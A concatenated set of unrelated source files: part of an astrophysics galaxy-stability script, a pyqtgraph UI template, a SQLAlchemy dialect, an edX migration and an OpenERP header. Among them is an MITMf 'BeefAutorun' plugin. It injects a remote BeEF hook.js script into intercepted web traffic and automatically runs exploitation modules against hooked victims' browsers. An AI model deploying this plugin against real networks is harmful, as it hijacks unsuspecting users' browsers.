shutil.copy2(path+'/v_gas_ma.dat', path+'/AD_MAX/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/AD_MAX/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/AD_MAX/v_stars_mi.dat')
#AD и Макс диск
mainf(PATH=path+'/AD_MAX',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=maxDisc,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='AD',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=5)
renameFilesByMethod(path+'/AD_MAX/', 'AD_MAX')
if not os.path.exists(path+'/AD_IBAND/'):
os.makedirs(path+'/AD_IBAND/')
else:
for f in os.listdir(path+'/AD_IBAND/'):
os.remove(path+'/AD_IBAND/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/AD_IBAND/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/AD_IBAND/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/AD_IBAND/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/AD_IBAND/v_stars_mi.dat')
#AD и I-band
mainf(PATH=path+'/AD_IBAND',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=M_to_L,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='AD',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=6)
renameFilesByMethod(path+'/AD_IBAND/', 'AD_IBAND')
##
# #Логгирование в файл
# sys.stdout = Tee(path + "/log_" + name + '.txt', 'w')
#
# # Работа с фотометрией в I полосе - два диска.
# poly_star, poly_gas, star_data, gas_data = bendStarRC(correctGasData, correctStarData, path, incl, 0.0, False,
# pol_degree_star, pol_degree_gas, name,
# scale, gas_corr_by_incl, False)
# h_disc *= scale
# R1, R2 = correctDistanceInterval(path, scale)
# R2 = 121
# evaluateSigLosWingsExpScale(path, r_eff_bulge)
# sigLosGaussParams, sigMajData = fitGaussSigLosMaj(correctSigmaLosMaj, path, scale, incl)
# sigLosPolyParams = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, False, min(Rmax, R2))
# sigLosSinhParams = fitSechSigLosMaj(correctSigmaLosMaj, path, scale, incl)
# sigLosGaussParamsMi, sigMiData = fitGaussSigLosMin(correctSigmaLosMin, path, scale, incl)
# sigLosPolyParamsMi = fitPolySigLosMin(correctSigmaLosMin, path, scale, incl, sig_pol_deg_mi, False, min(Rmax, R2))
# eval_SigPhi_to_sigR(poly_star, R1, R2, (R2 - R1) / 1000.0, path)
# evalEpyciclicFreq(poly_gas, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
# #M_to_L = mass_to_light_Iband(M_B - M_R)
# print '#!!!!!!!!!!!!# Mass-to-light ratio in I band (M/L) = ', M_to_L
# plotSurfDensForTwoDiscs(M_to_L, h_1, mu_1_I, h_2, mu_2_I, 0, Rmax, 0.1, path)
# gas_sf_data = surfaceDensityGas(path)
#
# r_surfd_gas = gas_sf_data[0]
# r_star_and_gas = list(arange(Rmin, Rmax, 0.1)) + r_surfd_gas
# r_star_and_gas.sort()
# # r_star_and_gas = filter(lambda x: ((x <= Rmax) & (x >= Rmin)), r_star_and_gas)
# # r_surfd_gas = filter(lambda x: ((x <= min(Rmax, R2)) & (x >= max(Rmin, R1, r_eff_bulge))), r_surfd_gas)
# r_star_and_gas = filter(lambda x: x > r_eff_bulge, r_star_and_gas)
# r_surfd_gas = filter(lambda x: x > r_eff_bulge, r_surfd_gas)
#
# h_kin, sigR2 = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star, poly_gas, 90)
# sigZ2, sigPhi2 = velosityEllipsoid(h_disc, r_star_and_gas, sigR2, path, incl, sigLosPolyParams, poly_star)
#
#
# # Решаем гравнеустойчивость для точек, где есть данные по газовой плотности
# star_density = [surfaceDensityStarForTwoDiscs(M_to_L, h_1, mu_1_I, h_2, mu_2_I, R) for R in r_surfd_gas]
# gas_density = [gas_sf_data[1][gas_sf_data[0].index(R)] for R in r_surfd_gas]
# sigma_corr_gas = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin, poly_star, poly_gas)) for R in r_surfd_gas]
# Qeffs = findTwoFluidQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path, resolution, 60.0)
# hydroQeffs = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, 60.0)
# hzGas = [zGas(R[1], R[2], resolution) / 2 for R in zip(r_surfd_gas, star_density, gas_density)]
# sigmaZgas = [math.sqrt(sigZ2Evaluation(R, h_disc, h_kin, poly_star, poly_gas, incl, sigLosPolyParams)) for R in
# r_surfd_gas]
# hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_surfd_gas, star_density, gas_density, sigmaZgas)]
# plotVerticalScale(star_density, gas_density, resolution, sigmaZgas, r_surfd_gas, path)
# discQeffs = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, hzStar, hzGas, 60.0)
# Qeffs1F = findOneFluidQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path, resolution,
# 60.0)
#
# # Смотрим, как отразится уменьшение толщины диска в два раза.
# hzStar = [hzs / 2 for hzs in hzStar]
# discQeffs_3 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, hzStar, hzGas, 60.0)
# # Смотрим, какие результаты в случае однородно толстого диска 0.2h
# hzStar = [0.1 * h_disc] * r_surfd_gas.__len__()
# discQeffs_4 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas, gas_density, star_density, sigma_corr_gas, path,
# resolution, hzStar, hzGas, 60.0)
#
#
# # То же для другого угла - чтобы понять зависимость от угла
# incl = incl + di
#
# poly_star1, poly_gas1, star_data1, gas_data1 = bendStarRC(correctGasData, correctStarData, path, incl, 0.0, False,
# pol_degree_star, pol_degree_gas, name,
# scale, gas_corr_by_incl, False)
# sigLosPolyParams1 = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, False, min(Rmax, R2))
# eval_SigPhi_to_sigR(poly_star1, R1, R2, 0.1, path)
# evalEpyciclicFreq(poly_gas1, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
# h_kin_1, sigR2_1 = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star1, poly_gas1, 90)
# sigZ2_1, sigPhi2_1 = velosityEllipsoid(h_disc, r_star_and_gas, sigR2_1, path, incl, sigLosPolyParams1, poly_star1)
# sigma_corr_gas_1 = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin_1, poly_star1, poly_gas1)) for R in r_surfd_gas]
# Qeffs_1 = findTwoFluidQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path, resolution,
# 60.0)
# hydroQeffs_1 = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path,
# resolution, 60.0)
# sigmaZgas = [math.sqrt(sigZ2Evaluation(R, h_disc, h_kin_1, poly_star1, poly_gas1, incl, sigLosPolyParams1)) for R in
# r_surfd_gas]
# hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_surfd_gas, star_density, gas_density, sigmaZgas)]
# discQeffs_1 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path,
# resolution, hzStar, hzGas, 60.0)
# Qeffs1F_1 = findOneFluidQeffs(r_surfd_gas, poly_gas1, gas_density, star_density, sigma_corr_gas_1, path, resolution,
# 60.0)
#
# # То же для другого угла
# incl = incl - 2 * di
#
# poly_star2, poly_gas2, star_data2, gas_data2 = bendStarRC(correctGasData, correctStarData, path, incl, 0.0, False,
# pol_degree_star, pol_degree_gas, name,
# scale, gas_corr_by_incl, False)
# sigLosPolyParams2 = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, False, min(Rmax, R2))
# eval_SigPhi_to_sigR(poly_star2, R1, R2, 0.1, path)
# evalEpyciclicFreq(poly_gas2, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
# h_kin_2, sigR2_2 = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star2, poly_gas2, 90)
# sigZ2_2, sigPhi2_2 = velosityEllipsoid(h_disc, r_star_and_gas, sigR2_2, path, incl, sigLosPolyParams2, poly_star2)
# sigma_corr_gas_2 = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin_2, poly_star2, poly_gas2)) for R in r_surfd_gas]
# Qeffs_2 = findTwoFluidQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path, resolution,
# 60.0)
# hydroQeffs_2 = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path,
# resolution, 60.0)
# sigmaZgas = [math.sqrt(sigZ2Evaluation(R, h_disc, h_kin_2, poly_star2, poly_gas2, incl, sigLosPolyParams2)) for R in
# r_surfd_gas]
# hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_surfd_gas, star_density, gas_density, sigmaZgas)]
# discQeffs_2 = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path,
# resolution, hzStar, hzGas, 60.0)
# Qeffs1F_2 = findOneFluidQeffs(r_surfd_gas, poly_gas2, gas_density, star_density, sigma_corr_gas_2, path, resolution,
# 60.0)
#
# # Монте-Карло реализации в количестве monte_carlo_realizations штук.
#
# incl = incl + di
# sigR2_list = [sigR2]
# sigZ2_list = [sigZ2]
# sigPhi2_list = [sigPhi2]
# Qeffs_list = [zip(*Qeffs)[2]]
# hydroQeffs_list = [zip(*hydroQeffs)[2]]
# discQeffs_list = [zip(*discQeffs)[2]]
# Qeffs1F_list = [Qeffs1F]
# MC_iter = 1
#
## while MC_iter < monte_carlo_realizations:
## MC_iter += 1
## print '#!!!!!!!!!!!!# Monte-Carlo iterration number ', MC_iter
## poly_star_mc, poly_gas_mc, star_data_mc, gas_data_mc = bendStarRC(correctGasData, correctStarData, path, incl,
## 0.0, False, pol_degree_star, pol_degree_gas, name,
## scale, gas_corr_by_incl, True)
## sigLosPolyParams_mc = fitPolySigLosMaj(correctSigmaLosMaj, path, scale, incl, sig_pol_deg, True, min(Rmax, R2))
## eval_SigPhi_to_sigR(poly_star_mc, R1, R2, 0.1, path)
## evalEpyciclicFreq(poly_gas_mc, arange(R1 + 2, R2, 0.1), path, resolution, h_disc)
## h_kin_mc, sigR2_mc = asymmetricDriftEvaluation(r_star_and_gas, h_disc, path, poly_star_mc, poly_gas_mc, 90)
## sigZ2_mc, sigPhi2_mc = velosityEllipsoid(h_disc, r_star_and_gas, sigR2, path, incl, sigLosPolyParams_mc,
## poly_star_mc)
## sigma_corr_gas_mc = [math.sqrt(sigR2Evaluation(R, h_disc, h_kin_mc, poly_star_mc, poly_gas_mc)) for R in
## r_surfd_gas]
## Qeffs_mc = findTwoFluidQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc, path,
## resolution, 60.0)
## hydroQeffs_mc = findTwoFluidHydroQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc,
## path,
## resolution, 60.0)
## sigmaZgas_mc = [
## math.sqrt(sigZ2Evaluation(R, h_disc, h_kin_mc, poly_star_mc, poly_gas_mc, incl, sigLosPolyParams_mc)) for R in
## r_surfd_gas]
## hzStar_mc = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in
## zip(r_surfd_gas, star_density, gas_density, sigmaZgas_mc)]
## discQeffs_mc = findTwoFluidWithDiscQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc,
## path,
## resolution, hzStar_mc, hzGas, 60.0)
## Qeffs1F_mc = findOneFluidQeffs(r_surfd_gas, poly_gas_mc, gas_density, star_density, sigma_corr_gas_mc, path,
## resolution,
## 60.0)
## sigR2_list.append(sigR2_mc)
## sigZ2_list.append(sigZ2_mc)
## sigPhi2_list.append(sigPhi2_mc)
## Qeffs_list.append(zip(*Qeffs_mc)[2])
## hydroQeffs_list.append(zip(*hydroQeffs_mc)[2])
## discQeffs_list.append(zip(*discQeffs_mc)[2])
## Qeffs1F_list.append(Qeffs1F_mc)
#
# plotFinalPics(path, poly_star, poly_gas, di, star_data, gas_data, incl, resolution, h_disc, r_eff_bulge,
# sigMajData, sigLosGaussParams, sigLosPolyParams, sigLosSinhParams, r_surfd_gas,
# zip(Qeffs1F, Qeffs1F_1, Qeffs1F_2) + Qeffs1F_list,
# zip(zip(*hydroQeffs)[2], zip(*hydroQeffs_1)[2], zip(*hydroQeffs_2)[2]) + hydroQeffs_list,
# zip(zip(*Qeffs)[2], zip(*Qeffs_1)[2], zip(*Qeffs_2)[2]) + Qeffs_list,
# zip(zip(*discQeffs)[2], zip(*discQeffs_1)[2], zip(*discQeffs_2)[2], zip(*discQeffs_3)[2], zip(*discQeffs_4)[2])
# + discQeffs_list,
# r_star_and_gas,
# zip(sigR2, sigR2_1, sigR2_2) + sigR2_list,
# zip(sigPhi2, sigPhi2_1, sigPhi2_2) + sigPhi2_list,
# zip(sigZ2, sigZ2_1, sigZ2_2) + sigZ2_list,
# hzStar, peculiarities, 1)
# plt.show()
finishTime = time.time()
print '#!!!!!!!!!!!!# Time total: ', (finishTime - startTime), 's'
print '#!!!!!!!!!!!!# THE END'
|
JenSte/pyqtgraph
|
refs/heads/develop
|
pyqtgraph/canvas/TransformGuiTemplate_pyqt5.py
|
30
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './pyqtgraph/canvas/TransformGuiTemplate.ui'
#
# Created: Wed Mar 26 15:09:28 2014
# by: PyQt5 UI code generator 5.0.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(224, 117)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())
Form.setSizePolicy(sizePolicy)
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setSpacing(1)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.translateLabel = QtWidgets.QLabel(Form)
self.translateLabel.setObjectName("translateLabel")
self.verticalLayout.addWidget(self.translateLabel)
self.rotateLabel = QtWidgets.QLabel(Form)
self.rotateLabel.setObjectName("rotateLabel")
self.verticalLayout.addWidget(self.rotateLabel)
self.scaleLabel = QtWidgets.QLabel(Form)
self.scaleLabel.setObjectName("scaleLabel")
self.verticalLayout.addWidget(self.scaleLabel)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.mirrorImageBtn = QtWidgets.QPushButton(Form)
self.mirrorImageBtn.setToolTip("")
self.mirrorImageBtn.setObjectName("mirrorImageBtn")
self.horizontalLayout.addWidget(self.mirrorImageBtn)
self.reflectImageBtn = QtWidgets.QPushButton(Form)
self.reflectImageBtn.setObjectName("reflectImageBtn")
self.horizontalLayout.addWidget(self.reflectImageBtn)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.translateLabel.setText(_translate("Form", "Translate:"))
self.rotateLabel.setText(_translate("Form", "Rotate:"))
self.scaleLabel.setText(_translate("Form", "Scale:"))
self.mirrorImageBtn.setText(_translate("Form", "Mirror"))
self.reflectImageBtn.setText(_translate("Form", "Reflect"))
|
0x0mar/MITMf
|
refs/heads/master
|
plugins/BeefAutorun.py
|
1
|
from plugins.plugin import Plugin
from plugins.Inject import Inject
from time import sleep
import sys
import json
import threading
import logging
import libs.beefapi as beefapi
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
has_opts = True
desc = "Injects BeEF hooks & autoruns modules based on Browser or OS type"
def initialize(self, options):
self.options = options
self.autoruncfg = options.autoruncfg
self.hookip = options.hookip
self.beefip = options.beefip
self.beefport = options.beefport
self.beefuser = options.beefuser
self.beefpass = options.beefpass
self.dis_inject = options.dis_inject
beef = beefapi.BeefAPI({"host": self.beefip, "port": self.beefport})
if beef.login(self.beefuser, self.beefpass):
print "[*] Successfully logged in to BeEF"
else:
sys.exit("[-] Error logging in to BeEF!")
userconfig = ConfigObj(self.autoruncfg)
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
self.Targeted_modules = userconfig["targets"]
if self.dis_inject:
if not self.hookip:
sys.exit("[-] BeEFAutorun requires --hookip")
Inject.initialize(self, options)
self.count_limit = 1
self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.hookip, self.beefport)
print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
t.setDaemon(True)
t.start()
def autorun(self, beef):
already_ran = []
already_hooked = []
while True:
sessions = beef.sessions_online()
if len(sessions) > 0:
for session in sessions:
if session not in already_hooked:
info = beef.hook_info(session)
logging.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
already_hooked.append(session)
if self.Mode == 'oneshot':
if session not in already_ran:
self.execModules(session, beef)
already_ran.append(session)
elif self.Mode == 'loop':
self.execModules(session, beef)
sleep(10)
else:
sleep(1)
def execModules(self, session, beef):
session_info = beef.hook_info(session)
session_ip = session_info['ip']
hook_browser = session_info['name']
hook_os = session_info['os']
if len(self.All_modules) > 0:
logging.info("%s >> sending generic modules" % session_ip)
for module, options in self.All_modules.items():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
logging.info('%s >> sent module %s' % (session_ip, mod_id))
else:
logging.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)
logging.info("%s >> sending targeted modules" % session_ip)
for os in self.Targeted_modules:
if (os in hook_os) or (os == hook_os):
browsers = self.Targeted_modules[os]
if len(browsers) > 0:
for browser in browsers:
if browser == hook_browser:
modules = self.Targeted_modules[os][browser]
if len(modules) > 0:
for module, options in modules.items():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
logging.info('%s >> sent module %s' % (session_ip, mod_id))
else:
logging.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)
def add_options(self, options):
options.add_argument('--hookip', dest='hookip', help="Hook IP")
options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
|
jackkiej/SickRage
|
refs/heads/master
|
lib/sqlalchemy/dialects/postgresql/zxjdbc.py
|
79
|
# postgresql/zxjdbc.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: postgresql+zxjdbc
:name: zxJDBC for Jython
:dbapi: zxjdbc
:connectstring: postgresql+zxjdbc://scott:tiger@localhost/db
:driverurl: http://jdbc.postgresql.org/
"""
from ...connectors.zxJDBC import ZxJDBCConnector
from .base import PGDialect, PGExecutionContext
class PGExecutionContext_zxjdbc(PGExecutionContext):
def create_cursor(self):
cursor = self._dbapi_connection.cursor()
cursor.datahandler = self.dialect.DataHandler(cursor.datahandler)
return cursor
class PGDialect_zxjdbc(ZxJDBCConnector, PGDialect):
jdbc_db_name = 'postgresql'
jdbc_driver_name = 'org.postgresql.Driver'
execution_ctx_cls = PGExecutionContext_zxjdbc
supports_native_decimal = True
def __init__(self, *args, **kwargs):
super(PGDialect_zxjdbc, self).__init__(*args, **kwargs)
from com.ziclix.python.sql.handler import PostgresqlDataHandler
self.DataHandler = PostgresqlDataHandler
def _get_server_version_info(self, connection):
parts = connection.connection.dbversion.split('.')
return tuple(int(x) for x in parts)
dialect = PGDialect_zxjdbc
|
benpatterson/edx-platform
|
refs/heads/master
|
lms/djangoapps/licenses/migrations/0001_initial.py
|
188
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CourseSoftware'
db.create_table('licenses_coursesoftware', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('full_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('url', self.gf('django.db.models.fields.CharField')(max_length=255)),
('course_id', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('licenses', ['CourseSoftware'])
# Adding model 'UserLicense'
db.create_table('licenses_userlicense', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('software', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['licenses.CourseSoftware'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('serial', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('licenses', ['UserLicense'])
def backwards(self, orm):
# Deleting model 'CourseSoftware'
db.delete_table('licenses_coursesoftware')
# Deleting model 'UserLicense'
db.delete_table('licenses_userlicense')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'licenses.coursesoftware': {
'Meta': {'object_name': 'CourseSoftware'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'licenses.userlicense': {
'Meta': {'object_name': 'UserLicense'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'serial': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'software': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['licenses.CourseSoftware']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['licenses']
|
duyetdev/openerp-6.1.1
|
refs/heads/master
|
openerp/addons/l10n_pe/__openerp__.py
|
8
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Cubic ERP - Teradata SAC (<http://cubicerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
